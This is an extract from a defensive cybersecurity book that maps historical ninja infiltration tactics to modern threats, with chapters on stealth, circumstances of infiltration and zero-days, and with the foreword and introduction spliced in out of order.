sary—one who is mindful of the observables they may leave (or not leave)

in your network.

Cyber Light, Noise, and Litter

,

The digital world does not always behave in the same ways as the physical

world. It can be challenging to understand and continuously hunt for the

cyber equivalents of light, noise, and litter. Because defenders lack the

time, resources, and capability to monitor and hunt within digital systems

under their control, an adversary’s light, noise, and/or litter trail too

often goes undocumented. As a result, threat actors may have an easier

time performing cyber infiltration than physical infiltration.

Many scanning and exploitation tools and frameworks, such as Nmap,8

have throttling modes or other “low-and-slow” methods that attempt to

exercise discipline on the size of packets or payloads, packet frequency,

and bandwidth usage on a target network. Adversaries have developed

extremely small malicious files (for instance, the China Chopper can be

156Chapter 20

less than 4KB9) that exploit defenders’ assumption that a file with such a

slight footprint won’t cause harm. Malware can be configured to minimize

the amount of noise it makes by beaconing command and control (C2)

posts infrequently, or it can minimize the noise in process logs or memory

by purposefully going to sleep or executing a no-operation (NOP) for long

periods. To avoid leaving digital litter that could reveal its presence, certain

malware does not drop any files to disk. Adversaries and malware on neigh-

boring network infrastructure can choose to passively collect information,

leading to a slow but fruitful understanding of the environment inside

the target. Notably, many of these threats also choose to accept the risk of

cyber light, noise, and/or litter that results from running their campaigns.

It is reasonable to assume that sufficiently advanced adversaries have

procedures to limit cyber light, noise, and litter, such as:

• Limiting communication with a target to less than 100MB

perday

• Ensuring that malware artifacts, files, and strings are not eas-

ily identified as litter that could reveal their own presence or be

attributed to the malware

• “Silencing” logs, alerts, tripwires, and other sensors so security is

not alerted to the intruder's presence

It seems that most current security devices and systems are designed

to trigger in response to the exact signature of a known threat, such as a

specific IP, event log, or byte pattern. Even with specialized software that

shows analysts threat activity in real time, such as Wireshark,10 it takes

significant effort to collect, process, and study this information. Contrast

this workflow with that of hearing footsteps and reacting. Because

humans cannot perceive the digital realm with our senses in the same

way that we perceive the physical environment, security measures are basi-

cally guards with visual and hearing impairments waiting for a prompt to

take action against a threat across the room.

Detection Discipline

Unfortunately, there is no ideal solution for catching someone skilled

in the ways of not being caught. Some threat actors have such an advan-

tage over defenders in this realm that they can gain unauthorized access

to the security team’s incident ticket tool and monitor it for any new

investigations that reference their own threat activity. However, there

are improvements to be made, training to be had, countermeasures to

deploy, and tricks defenders can try to trip up or catch the threat in a tra-

decraft error.

Light, Noise, and LitterDiscipline157

1. Practice awareness. As part of training for threat hunting, incident

response, and security analysis, teach your security team to look

for indications of an adversary’s light, noise, or litter.

2. Install squeaky gates. Consider implementing deceptive attack sens-

ing and warning (AS&W) indicators, such as security events that

go off every minute on domain controllers or other sensitive sys-

tems or networking devices. For example, you might implement a

warning that says “[Security Event Log Alert]: Windows failed to

activate Windows Defender/Verify this version of Windows.” This

may deceive an infiltrating adversary into thinking you’re not pay-

ing attention to your alerts, prompting the adversary to “turn off”

or “redirect” security logs away from your sensors or analysts. The

sudden absence of the false alert will inform your defenders of the

adversary’s presence (or, in the case of a legitimate crash, of the

need to reboot the system or have IT investigate the outage).

3. Break out the wooden clappers. Consider how an advanced adversary

could purposefully trigger alerts or cause noticeable network

noise from a protected or hidden location in your environment

(that is, attacking known honeypots) to observe your security

team’s ability to detect and respond. This is the cyber equivalent

of a ninja running through your house at night slamming two

pieces of wood together to test your response. It’s reasonable to

assume that some adversaries may assess your security in this way

so they can determine whether they can use zero days or other

covert techniques without fear of discovery.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . As it is not feasible to have eyes everywhere, you

have positioned your guards where they can listen for odd sounds in key

egress pathways . You have also trained your guards to notice anomalous

noises . You are told that shinobi have specially made sandals with soft,

fabric-stuffed soles so they can walk on tile or stone without making noise .

How could you use this information to detect a ninja in your castle?

What evidence might these special sandals leave behind? What countermea-

sures could you deploy to mitigate the threat these sandals pose? How would

you train your guards to react when they see a person in the castle walking

suspiciously quietly?

158Chapter 20

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated in

terms of the light, noise, and litter that might accompany an attack.

1. Determine your organization’s detection capabilities by simulat-

ing network infiltration by both loud-and-fast and low-and-slow

adversaries. Document which logs are associated with which

observable activity and where you may have sensory dead spots.

[AU-2: Audit Events; CA-8: Penetration Testing; SC-42: Sensor

Capability and Data]

2. Correlate incident logs, alerts, and observables with documented

threat actions to better educate your staff and test your percep-

tion of how threats will “sound” on the network. [IR-4: Incident

Handling | (4) Information Correlation]

3. Tune your sandboxes and detonation chambers to look for

indicators of a threat actor who is attempting to exercise the

cyber equivalent of light, noise, and litter discipline. [SC-44:

Detonation Chambers]

4. Use non-signature-based detection methods to look for covert dis-

ciplined activity designed to avoid signature identification. [SI-3:

Malicious Code Protection | (7) Nonsignature-Based Detection]

5. Deploy information system monitoring to detect stealth activity.

Avoid placing oversensitive sensors in high-activity areas. [SI-4:

Information System Monitoring]

Debrief

In this chapter, we reviewed the precautions shinobi took and the tools

they used to hide evidence of their activity—for example, measuring how

much noise they could make before alerting the guards and learning

what the target was likely to do if shinobi activity were discovered. We dis-

cussed several cyber tools that adversaries have used and how they might

be understood as the equivalent of light and noise—evidence that can

be detected by defenders. Lastly, we reviewed potential countermeasures

that defenders can take.

In the next chapter, we will discuss circ*mstances that assist shinobi

in infiltration because

,

they mitigate the problems of light, noise, and lit-

ter. For example, a strong rainstorm would mask noise, obscure visibility,

and clear away evidence of their presence. A cyber defender can consider

analogous circ*mstances to protect their systems.

21

C I R C U M S T A N C E S O F

I N F I L T R A T I O N

You should infiltrate at the exact moment that the enemy moves and not

try when they do not move—this is a way of principled people.

In heavy rainfall, when the rain is at its most, you should take

advantage of it for your shinobi activities and night attacks.

—Yoshimori Hyakushu #1

The Ninpiden and Bansenshūkai both advise that when

moving against a target, shinobi should use cover to go

undetected. They may wait for circ*mstances in which

cover exists or, if necessary, create those circ*mstances

themselves. The scrolls provide a wide range of situations

that can aid infiltration, from natural occurrences (strong

winds and rain) to social gatherings (festivals, weddings,

and religious services) to shinobi-initiated activity (releas-

ing horses, causing fights, and setting fire to buildings).1

Regardless of their source, a canny shinobi should be able

to capitalize on distractions, excitement, confusion, and

other conditions that divert the target’s focus.

160Chapter 21

Shinobi were able to turn inclement weather into favorable infiltra-

tion circ*mstances. For instance, heavy rainstorms meant empty streets,

poor visibility, and torrents to muffle any sounds the shinobi made.2 Of

course, bad weather is bad for everyone, and the second poem of the

Yoshimori Hyakushu notes that too strong a storm can overpower a shinobi,

making it difficult to execute tactics and techniques: “In the dead of

night, when the wind and rain are raging, the streets are so dark that shi-

nobi cannot deliver a night attack easily.”3

Shinobi also capitalized on other, more personal circ*mstances, such

as a tragic death in the target’s family. The scrolls point out that while

a target is in mourning, they may not sleep well for two or three nights,

meaning the shinobi may approach unnoticed during the funeral or

bereavement disguised as a mourner, or wait to infiltrate until the target

finally sleeps deeply on night three or four.4

Of course, a shinobi’s mission did not always coincide with provi-

dence. In some cases, shinobi took it upon themselves to cause severe ill-

ness at the target fortification. Sick people were ineffective defenders, and

their worried caregivers were preoccupied and denied themselves sleep to

tend to the ill. When the afflicted began to recover, the relieved caregiv-

ers slept heavily, at which point shinobi infiltrated. Alternatively, shinobi

could destroy critical infrastructure, such as a bridge, and then wait for

the target to undertake the large and difficult reconstruction project in

the summer heat before infiltrating an exhausted opponent.5

Effective distractions could also be more directly confrontational.

Bansenshūkai describes a technique called kyonin (“creating a gap by sur-

prise”) that employs the assistance of military forces or other shinobi.

These allies make the target think an attack is underway, perhaps by

firing shots, beating war drums, or shouting, and the shinobi can slip in

during the confusion. When the shinobi wanted to exit safely, this tech-

nique was simply repeated.6

In this chapter, we will review how using situational factors to aid in

infiltration as described in the shinobi scrolls apply to the digital era.

The use of situational factors depends on defenders, security systems,

and organizations having finite amounts of attention. Overloading, con-

fusing, and misdirecting that limited attention creates opportunities a

threat actor can exploit. We will identify various opportunities that can

be found in modern networked environments and explain how they par-

allel the circ*mstances described in the shinobi scrolls. Finally, we will

review how organizations can incorporate safeguards and resiliency to

prepare for circ*mstances that may weaken their defenses.

Circ*mstances of Infiltration161

Adversarial Opportunity

Cybersecurity adversaries may distract their targets and create condi-

tions that make detecting infiltration as widely—and wisely—as shinobi

once did. For example, when cyberdefenders detect a sudden distrib-

uted denial of service (DDoS) attack, standard operating procedures

require evaluating the strength and duration of the DDoS and creating

a security incident ticket to log the activity. Defenders may not immedi-

ately suspect a DDoS as cover for a threat actor’s attack on the network.

So when the attack overwhelms the target’s security sensors and packet

capture (pcap) and intrusion detection or prevention systems (IDS/IPS)

fail to open—in other words, when there is too much communication

to inspect—defensive systems might naturally rush the packet along

without searching it for malicious content. When the DDoS ceases, the

defenders will note that there was no significant downtime and return

their status to normal, not realizing that, while the DDoS lasted only 10

minutes, the packet flood gave the adversary enough time and cover to

compromise the system and establish a foothold in the network. (As in

Yoshimori Hyakushu 2, which warned that a strong storm could hinder

both target and attacker, the adversary is unlikely to deploy an overly

intense DDoS. Doing so could cause networking gear to drop packets

and lose communication data—including their own attacks. Instead, an

attacker will likely throttle target systems to overwhelm security without

disrupting communication.)

Adversaries have many other ways to create favorable circ*mstances

in the infiltration target; they are limited only by their ingenuity. It could

be advantageous to attack service and infrastructure quality and reli-

ability, such as by disrupting ISPs or interconnections. Patient attackers

could wait for commercial vendors to release faulty updates or patches,

after which the target’s security or IT staff temporarily creates “permit

any-any” conditions or removes security controls to troubleshoot the

problem. Threat actors might monitor a company’s asset acquisition

process to determine when it moves new systems and servers to produc-

tion or the cloud—and, hence, when these targets might be temporarily

unguarded or not properly configured against attacks. Threat actors

might also track a corporate merger and attempt to infiltrate gaps cre-

ated when the different companies combine networks. Other adversaries

might use special events hosted in the target’s building, such as large

conferences, vendor expos, and third-party meetings, to mingle in the

crowd of strangers and infiltrate the target. They might even pick up a

swag bag in the process.

162Chapter 21

Adversarial Adversity

It is considered infeasible to guarantee 100 percent uptime of digital

systems, and it should be considered even harder to guarantee 100 per-

cent assurance of security at all times for those same digital systems.

Furthermore, it is almost certainly impossible to prevent disasters, haz-

ards, accidents, failures and unforeseen changes—many of which will

create circ*mstances in which opportunistic threat actors can infiltrate.

Being overly cautious to avoid these circ*mstances can hamper a busi-

ness’s ability to be bold in strategy and execute on goals. A solution to

this dilemma may be to redundantly layer systems to reduce infiltra-

tion opportunities. Security teams might put in place the equivalent of

high-availability security—security that is layered redundantly where

systems are weaker. Practice awareness and preparation. As part of security

staff protocols for change management, events, incidents, crises, natural

disasters, and other distracting or confusing circ*mstances, train your

security team to look for indications that an event was created or is being

used by adversaries

,

to infiltrate the organization. Document role respon-

sibilities in organizational policies and procedures. Use threat modeling,

tabletop exercises, and risk management to identify potential distrac-

tions, then consider safeguards, countermeasures, and protections for

handling them.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . You have noticed that during especially cold and

windy ice storms, your gate guards hunker down in their posts, cover their

faces, and keep themselves warm with small, unauthorized fires—fires that

reduce their night vision and make their silhouette visible .

How might a shinobi take advantage of extreme conditions, such as a

blizzard or ice storm, to infiltrate your castle? How would they dress? How

would they approach? How freely could they operate with respect to your

guards? What physical access restrictions and security protocols could your

guards apply during a blizzard? Could you change the guard posts so your

soldiers could effectively watch for activity during such conditions? Besides

weather events, what other distracting circ*mstances can you imagine, and

how would you handle them?

Circ*mstances of Infiltration163

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. They should be evaluated with

the concept of circ*mstances of infiltration in mind.

1. Identify and document how different security controls and

protocols—for example, authentication—might be handled

during emergencies or other extreme circ*mstances to miti-

gate adversary infiltration. [AC-14: Permitted Actions Without

Identification or Authentication]

2. Establish controls and policies around the conditions for using

external information systems, particularly during extenuating

circ*mstances. [AC-20: Use of External Information Systems]

3. Launch penetration testing exercises during contingency train-

ing for simulated emergencies, such as fire drills, to test defensive

and detection capabilities. [CA-8: Penetration Testing; CP-3:

Contingency Training; IR-2: Incident Response Training]

4. Enforce physical access restrictions for visitors, as well as for cir-

c*mstances in which it is not possible to escort a large number of

uncontrolled persons—for example, firefighters responding to

a fire—but unauthorized system ingress and egress must still be

prevented. [PE-3: Physical Access Control]

5. Develop a capability to shut off information systems and networks

in the event of an emergency, when it is suspected that an adver-

sary has compromised your defenses. [PE-10: Emergency Shutoff]

6. Consider how your organization can incorporate adversary

awareness and hunting into contingency planning. [CP-2:

Contingency Plan]

7. Evaluate whether a sudden transfer or resumption of business

operations at fallback sites will create opportune circ*mstances

for adversary infiltration. Then consider appropriate defensive

safeguards and mitigations. [CP-7: Alternate Processing Site]

Debrief

In this chapter, we reviewed the tactic of creating and/or waiting for cir-

c*mstances that provide cover for infiltrating a target. We looked at sev-

eral examples of how shinobi would create an opportunity when a target

was well defended, and we explored how this tactic could play out in mod-

ern networked environments. We covered various methods for managing

164Chapter 21

security during times of weakness, and through the thought exercise,

we looked at preparing for circ*mstances where risk cannot be avoided,

transferred, or countered.

In the next chapter, we will discuss the zero-day, or a means of infil-

tration so novel or secret that no one has yet thought about how to defend

against it. Shinobi had exploits and techniques similar to zero-days; they

were so secret, it was forbidden to write them down, and the scrolls only

allude to them indirectly. We are left only with cryptic clues—clues pro-

vided to remind a shinobi of a secret technique they had learned, but not

to teach it. Even so, the scrolls provide insight around how to create new

zero-days, procedures to defend against them, and tradecraft in execut-

ing them. Furthermore, the scrolls describe several historical zero-day

techniques that had been lost due to their disclosure, giving us insight

into modern zero-day exploits and a potential forecast of zero-days of

thefuture.

22

Z E R O - D A Y S

A secret will work if it is kept; you will lose if words are given away.

You should be aware that you shouldn’t use any of the ancient ways

that are known to people because you will lose the edge of surprise.

—Shōninki, “Takaki wo Koe Hikuki ni Hairu no Narai” 1

One of the shinobi’s key tactical advantages was secrecy.

The scrolls repeatedly warn shinobi to prevent others from

learning the details of their capabilities, since if knowledge

of a technique leaked to the public, the consequences

could be disastrous. Not only could the techniques be

invalidated for generations, but the lives of shinobi using

a leaked technique could be in danger. Both Shōninki and

the Ninpiden describe the hazards of exposing secret ninja

tradecraft to outsiders, with some scrolls going so far as

to advise killing targets who discover tradecraft secrets or

bystanders who observe a shinobi in action.2

Both Shōninki and the Ninpiden cite ancient techniques that were

spoiled due to public exposure. For instance, when ancient ninjas (yato)3

conducted reconnaissance, they sometimes traveled across farm fields;

166Chapter 22

they avoided detection by, among other means, dressing like a scarecrow

and snapping into a convincing pose when people approached.4 Once

this technique was discovered, however, locals regularly tested scarecrows

by rushing them or even stabbing them. No matter how convincing the

shinobi’s disguise or how skillful their pantomime, the technique became

too risky, and shinobi had to either develop new ways to hide in plain

sight or avoid fields altogether. The skill was lost.

Similarly, some shinobi became master imitators of cat and dog

sounds, so that if they accidentally alerted people to their presence dur-

ing a mission, they could bark or mew to convince the target that the

disturbance was just a passing animal and there was no need for further

inspection. This technique was also discovered eventually. Guards were

trained to investigate unfamiliar animal noises, putting shinobi at risk of

discovery.5

The scrolls also describe situations in which a fortification was pro-

tected by dogs that shinobi could not kill, kidnap, or befriend without

rousing suspicion from security guards. In this situation, the scrolls tell

shinobi to wear the scent of whale oil and then either wait for the dog to

stray away from the guards or lure the dog away. They then beat the dog,

and they do this several nights in a row. With its pungency and rarity, the

scent of whale oil conditions the dog to associate pain and punishment

with the odor, and the dog is then too afraid to attack shinobi wearing

the distinctive scent. When this technique was disclosed, guards were

trained to notice the unique scent of whale oil or when their dog’s behav-

ior suddenly changed.6

Of course, most shinobi secrets went unexposed until the formal pub-

lication of the scrolls many years after the shinobi were effectively a his-

torical relic. Therefore, defenders of the era had to create techniques to

thwart attacks of which they had no details—potentially even attacks that

the attackers themselves had not yet considered.

For shinobi acting as defenders, the scrolls offer some baseline

advice. Bansenshūkai’s “Guideline for Commanders”7 volumes recommend

various security best practices, including passwords, certification stamps,

identifying marks, and secret signs and signals. The scroll also

,

advises

commanders to contemplate the reasoning behind these security strata-

gems; pair them with other standard protocols, such as night watches and

guards; take advanced precautions, such as setting traps; and develop

their own secret, custom, dynamic security implementations. Together,

these techniques defended against attackers of low or moderate skill but

not against the most sophisticated shinobi.8

To that end, Bansenshūkai’s most pragmatic security advice is that

defenders will never be perfectly secure, constantly alert, or impeccably

Zero-Days167

disciplined. There will always be gaps that shinobi can exploit. Instead,

the scroll emphasizes the importance of understanding the philosophy,

mindset, and thought processes of one’s enemies, and it implores shinobi

to be open to trying new techniques, sometimes on the fly: “It is hard to

tell exactly how to act according to the situation and the time and the

place. If you have a set of fixed ways or use a constant form, how could

even the greatest general obtain a victory?”9

Shinobi defenders used creative mental modeling, such as by imagin-

ing reversed scenarios and exploring potential gaps. They drew inspira-

tion from nature, imagining how a fish, bird, or monkey would infiltrate

a castle and how they could mimic the animal’s abilities.10 They derived

new techniques by studying common thieves (nusubito). Above all, they

trusted the creativity of the human mind and exercised continuous learn-

ing, logical analysis, problem solving, and metacognitive flexibility:

Although there are millions of lessons for the shinobi, that

are both subtle and ever changing, you can’t teach them in

their entirety by tradition or passing them on. One of the most

important things for you to do is always try to know everything

you can of every place or province that is possible to know. . . .

If your mind is in total accordance with the way of things and

it is working with perfect reason and logic, then you can pass

through “the gateless gate.” . . . The human mind is marvelous

and flexible. It’s amazing. As time goes by, clearly or mysteri-

ously, you will realize the essence of things and understanding

will appear to you from nowhere. . . . On [the path of the shi-

nobi] you should master everything and all that you can . . . you

should use your imagination and insight to realize and grasp

the way of all matters. 11

A forward-thinking shinobi with a keen mind and a diligent work

ethic could build defenses strong enough to withstand unknown attacks,

forcing enemies to spend time and resources developing new attack

plans, testing for security gaps, and battling hidden defenses—only to

be thwarted once again when the whole security system dynamically

changed.

In this chapter, we will explore the modern threat landscape of zero-

days and understand what of the philosophy and tradecraft described

in the shinobi scrolls we can apply to cybersecurity. In addition, we will

explore various proposed defenses against zero-days. The castle thought

exercise in this chapter presents the challenge of addressing unknown

and potential zero-days hidden in modern computing hardware, soft-

ware, clouds, and networks—all in the hope of provoking new insights.

168Chapter 22

Zero-Day

Few terms in the cybersecurity lexicon strike fear into the hearts of

defenders and knowledgeable business stakeholders like zero-day (or

0-day), an exploit or attack that was previously unknown and that defend-

ers may not know how to fight. The term comes from the fact that the

public has known about the attack or vulnerability for zero days. Because

victims and defenders have not had the opportunity to study the threat,

a threat actor with access to a zero-day that targets a common technol-

ogy almost always succeeds. For example, STUXNET used four zero-day

exploits to sabotage an air-gapped nuclear enrichment facility in Iran,

demonstrating the power of zero-days to attack even the most secure and

obscure targets.12

A zero-day attack derives its value from the fact that it is unknown.

As soon as a threat actor uses a zero-day, the victim has the chance to

capture evidence of the attack via sensors and monitoring systems, foren-

sically examine that evidence, and reverse engineer the attack. After the

zero-day appears in the wild, security professionals can quickly develop

mitigations, detection signatures, and patches, and they will publish CVE

numbers to alert the community. Not everyone pays attention to such

advisories or patches their systems, but the 0-day is increasingly less likely

to succeed as it becomes a 1-day, 2-day, and so on.

Zero-days are deployed in different ways depending on the

attacker’s motivations. Cybercriminals interested in a quick, lucrative

score might immediately burn a zero-day in a massive and highly vis-

ible attack that maximizes their immediate return. More advanced

threat actors establish procedures to delete artifacts, logs, and other

observable evidence of a zero-day attack, extending its useful life.

Truly sophisticated attackers reserve zero-days for hardened, valuable

targets, as zero-days that target popular technologies can sell for thou-

sands of dollars to cybercriminals on the black market—or more than

$1 million to governments eager to weaponize them or build a defense

against them.

While some zero-days come from legitimate, good-faith security

gaps in software code, threat actors can introduce zero-days into a soft-

ware application’s source code maliciously through agreements or covert

human plants. Targeted attacks can also compromise software libraries,

hardware, or compilers to introduce bugs, backdoors, and other hidden

vulnerabilities for future exploitation, in much the same way a ninja join-

ing a castle construction team might compromise the design by creating

secret entrances that only the ninja knows about (the scrolls tell us this

happened).13

Zero-Days169

Traditionally, zero-day discoveries have come from security research-

ers with deep expertise studying code, threat hunters thinking creatively

about vulnerabilities, or analysts accidentally discovering the exploit

being used against them in the wild. While these methods still work,

recent technologies such as “fuzzing” have helped automate zero-day

detection. Fuzzers and similar tools automatically try various inputs—

random, invalid, and unexpected—in an attempt to discover previously

unknown system vulnerabilities. The advent of AI-powered fuzzers and AI

defenders signals a new paradigm. Not unlike the way that the invention

of the cannon, which could pierce castle walls, led to new defense strate-

gies, AI offers the possibility that defenses may someday evolve almost

as quickly as the threats themselves. Of course, attack systems may also

learn how to overwhelm any defensive capability, altering not just how the

industry detects and fights zero-days but how the world looks at cyberse-

curity as a whole.

For now, though, the pattern of exploit and discovery is cyclical.

Threat actors become familiar with a subset of exploits and vulnerabili-

ties, such as SQL injection, XSS, or memory leaks. As defenders become

familiar with combatting those threats, attackers move to exploiting

different techniques and technologies, and the cycle continues. As time

goes by and these defenders and attackers leave the workforce, we will

likely observe a new generation of threat actors rediscovering the same

common weaknesses in new software and technologies, resulting in the

reemergence of old zero-days—the cycle will begin anew.

Zero-Day Defense

Zero-day detection and protection are often the go-to claim for new

entrants to the cybersecurity market, as they like to promise big results

from their solution. That isn’t to say none of them work. However, this topic

can easily fall into snake-oil territory. Rest assured that I am not trying to

sell you anything but practical guidance

,

were scripted in medieval times but carefully kept secret until the mid-20th

century. The scrolls were recently translated from Japanese to English. The

xviiiForeword

translation reveals just how ninjas were trained to think, strategize, and

act. Ninjas, being covert agents, cautiously kept their strategies and tactics

secret. But the revelations made through the publication of their scrolls

are worth a deep analysis to understand what made ninjas so successful in

their espionage, deception, and surprise attack missions over centuries.

Ben’s analysis of these scrolls gleans the strategies, tactics, and tech-

niques that ninjas used to conduct their attacks. He maps these ancient

tactics and techniques to the modern-day tactics, techniques, and proce-

dures (TTPs) used by hackers to conduct cyberattacks. Reading through

the playbook and procedures will help security professionals understand

not only how a ninja thinks, but also how a cybercriminal thinks. With

that understanding, you will be able to develop the craft of really think-

ing like a hacker and internalizing that security principle. Not only will

that help you predict the hacker’s potential next move, but it will also give

you time to prepare for that move and build up your defenses to prevent

the hacker from reaching their goal.

Another reason why Ben’s use of the ninja scrolls to bring these TTPs

closer to cyberdefenders is a very smart approach is because these scrolls

deal with attacks in the physical world; that is, they reference physical

objects and describe movements within a physical environment. Physical

environments are much easier for our brains to visualize than cyber or

virtual environments. Thinking about the hacker’s tactics and techniques

as they relate to tangible assets makes them more discernible. You can

start envisaging how a hacker might apply a particular TTP to compro-

mise one asset or move from one asset to another. In each chapter, Ben

brilliantly takes you through a castle theory thought exercise to help you

visualize those movements in a medieval castle and then translate them

to a cyber environment.

Readers will greatly benefit from the wealth of tips and strategies

Ben lays out. This is a timely contribution: cybersecurity is becoming one

of the main pillars of our economy. Ben McCarty, with his decade-long

threat intelligence experience, is exceptionally well positioned to share

the practical tips of how to think like a ninja and a hacker in order to pro-

tect both your information and the digital economy at large.

MALEKBENSALEM, PhD

Security R&D Lead

Accenture

A C K N O W L E D G M E N T S

I must start by thanking my lovely Sarah. From reading early drafts to giv-

ing me advice on the cover and providing me with the freedom to write a

book, thank you so much.

To Chris St. Myers, thank you for keeping me engaged and happy under

your leadership while I was conducting deep threat intelligence research

into cyber espionage. The experience was essential for me to saliently cap-

ture the minds of cyber espionage threat actors. You never stopped me; you

only encouraged me and taught me many things along the way.

I’m eternally grateful to the US Army TRADOC cadre and DET-

MEADE, who recognized my potential and placed me into the first cyber-

warfare class and unit. This unique experience was especially formative for

my understanding of cybersecurity and operator tradecraft.

A very special thanks to Antony Cummins and his team for translating

the ninja scrolls and making them available to the English-speaking world.

It is because of your efforts and infectious passion for the ninja that I found

the inspiration to write this book.

To everyone at No Starch Press who helped improve the manuscript

and make it into a book I am proud of, thank you.

Finally, thank you to all those who have been a part of my cybersecurity

journey. Learning from other cybersecurity professionals has been a plea-

sure and has greatly enriched my overall knowledge and understanding of

cybersecurity and threats. I needed every bit of it to write this book.

I N T R O D U C T I O N

First and foremost: I am not a ninja. Nor am I a ninja

historian, a sensei, or even Japanese.

However, I did perform cyber warfare for the US Army, where my fel-

low soldiers often described our mission as “high-speed ninja sh*t.” That’s

when I really started noticing the odd prevalence of “ninja” references in

cyber security. I wanted to see if there was anything substantive behind the

term’s use. I started researching ninjas in 2012, and that’s when I found

recent English translations of Japanese scrolls written more than 400 years

ago (more on those in the “About This Book” section that follows). These

scrolls were the training manuals that ninjas used to learn their craft—not

historical reports but the actual playbooks. One of these, Bansenshūkai, was

declassified by the Japanese government and made available to the public

on a limited basis only after World War II, as the information had been

considered too dangerous to disseminate for almost 300 years. In medieval

times, non-ninjas were never supposed to see these documents. Bold warn-

ings in the scrolls inform readers to protect the information with their lives.

At one time, simply possessing such a scroll was enough to merit execution

in Japan. The taboo nature of the material added an undeniable mystique

to the reading experience. I was hooked.

After reading more than 1,000 pages of translated source material, it

became clear that the instructions and secret techniques meant for ninjas

were essentially on-the-ground training in information assurance, secu-

rity, infiltration, espionage, and destructive attacks that relied on covert

access to heavily fortified organizations—many of the same concepts

xxiiIntroduction

Idealt with every day of my career in cybersecurity. These 400-year-old

manuals were filled with insights about defensive and offensive security

for which I could not find equivalents in modern information assurance

practices. And because they were field guides that laid bare the tactics,

techniques, and procedures (TTPs) of secret warfare, they were truly

unique. In our business, nation-state cyber espionage units and other

malicious actors do not hold webinars or publish playbooks that describe

their TTPs. Thus, these ninja scrolls are singular and invaluable.

Cyberjutsu aims to turn the tactics, techniques, strategies, and

mentalities of ancient ninjas into a practical cybersecurity field guide.

Cybersecurity is relatively young and still highly reactionary. Industry pro-

fessionals often spend their days defusing imminent threats or forecasting

future attacks based on what just happened. I wrote this book because I

believe we have much to learn by taking a long view offered in these scrolls

of information security’s first advanced persistent threat (APT). The infor-

mation warfare TTPs practiced by ancient ninjas were perfected over hun-

dreds of years. The TTPs worked in their time—and they could be the key

to leapfrogging today’s cybersecurity prevailing models, best practices, and

concepts to implement more mature and time-tested ideas.

About This Book

Each chapter examines one ninja-related topic in detail, moving from

a broad grounding in history and philosophy to analysis to actionable

cybersecurity recommendations. For ease of use, each chapter is orga-

nized as follows:

The Ninja Scrolls A brief introduction to a tool, technique, or

methodology used by ninjas.

Cybersecurity An analysis of what the ninja concept teaches us

about the current cybersecurity landscape.

What You Can Do Actionable steps, derived from the preceding

analysis, that you can take to secure your organization against cyber

threats.

Castle Theory Thought Exercise An exercise that asks you to solve

a threat scenario using what you’ve learned about ninja and cyber

concepts.

Recommended

,

on the threat, as detailed below.

1. Follow best practices. Just because zero-days are maddeningly dif-

ficult to defend against does not mean that you should give up on

security. Follow industry best practices. While they may not fully

neutralize zero-days, they do make it harder for threat actors to

conduct activities against your environment, and they give your

organization a better chance to detect and respond to zero-day

attacks. Rather than idly worrying about potential zero-days,

patch and mitigate 1-days, 2-days, 3-days, and so on, to minimize

the time your organization remains vulnerable to known attacks.

170Chapter 22

2. Use hunt teams and blue teams. Form or contract a hunt team and a

blue team to work on zero-day defense strategies.

The hunt team comprises specialized defenders who do not

rely on standard signature-based defenses. Instead, they constantly

develop hypotheses about how adversaries could use zero-days or

other methods to infiltrate networks. Based on those hypotheses,

they hunt using honeypots, behavioral and statistical analysis, pre-

dictive threat intelligence, and other customized techniques.

The blue team comprises specialized defenders who design,

test, and implement real defenses. First, they document the infor-

mation flow of a system or network, and then they build threat

models describing real and imagined attacks that could succeed

against the current design. Unlike with the hunt team, it is not

the blue team’s job to find zero-days. Instead, they evaluate their

information and threat models in terms of zero-days to deter-

mine how they could effectively mitigate, safeguard, harden, and

protect their systems. The blue team exists apart from normal

security, operations, and incident response personnel, though

the team should review existing incident response reports to

determine how defenses failed and how to build proactive

defenses against similar future attacks.

3. Implement dynamic defenses . . . with caution. In recent years, security

professionals have made concerted efforts to introduce complex

and dynamic defense measures that:

• Attempt to make a network a moving target—for example,

nightly updates

• Introduce randomization—for example, address space layout

randomization (ASLR)

• Dynamically change on interaction—for example, quantum

cryptography

• Initiate erratic defense conditions or immune response

systems

Some of these dynamic defenses were quite successful initially,

but then adversaries developed ways to beat them, rendering

them effectively static from a strategic perspective.

Talk to cybersecurity vendors and practitioners and explore

the literature on state-of-the-art dynamic defenses to determine

what would work for your organization. Proceed with caution,

however, as today’s dynamic defense can become tomorrow’s

standard-issue, easily circumvented security layer.

Zero-Days171

4. Build a more boring defense. Consider utilizing “boring” systems,

coding practices, and implementations in your environment

where possible. Started by Google’s BoringSSL open source proj-

ect,14 the boring defense proposes that simplifying and reducing

your code’s attack surface, size, dependency, and complexity—

making it boring—will likely eliminate high-value or critical

vulnerabilities. Under this practice—which can be effective on a

code, application, or system level—code is not elaborate or art-

ful but rather tediously secured and unvaried in structure, with

dull and simple implementations. In theory, making code easier

for humans and machines to read, test, and interpret makes it

less likely that unexpected inputs or events will unearth zero-day

vulnerabilities.

5. Practice denial and deception (D&D). D&D prevents adversaries

from obtaining information about your environment, systems,

network, people, data, and other observables, and it can deceive

them into taking actions that are advantageous to you. Making

adversaries’ reconnaissance, weaponization, and exploit delivery

harder forces them to spend more time testing, exploring, and

verifying that the gap they perceive in your environment truly

exists. For example, you could deceptively modify your systems to

advertise themselves as running a different OS with different soft-

ware, such as by changing a Solaris instance to look like a differ-

ent SELinux OS. (Ideally, you would actually migrate to SELinux,

but the logistics of legacy IT systems may keep your organization

reliant on old software for longer than desired.) If your decep-

tion is effective, adversaries may try to develop and deliver wea-

ponized attacks against your SELinux instance—which will, of

course, fail because you’re not actually running SELinux.

Note that D&D should be applied on top of good security

practices to enhance them rather than leveraged on its own to

achieve security through obscurity. D&D is a security endgame

for extremely mature organizations looking for additional ways to

defend systems from persistent threat actors, similar to the “hush-

hush tactics” described in Bansenshūkai.15

6. Disconnect to protect. In its discussion of the disconnect defense,

Shōninki teaches you to disconnect from the enemy mentally,

strategically, physically, and in every other way.16 In cybersecurity,

this means creating a self-exiled blue team that turns completely

inward, working in isolation from the world and ignoring all secu-

rity news, threat intelligence, patches, exploits, malware variations,

172Chapter 22

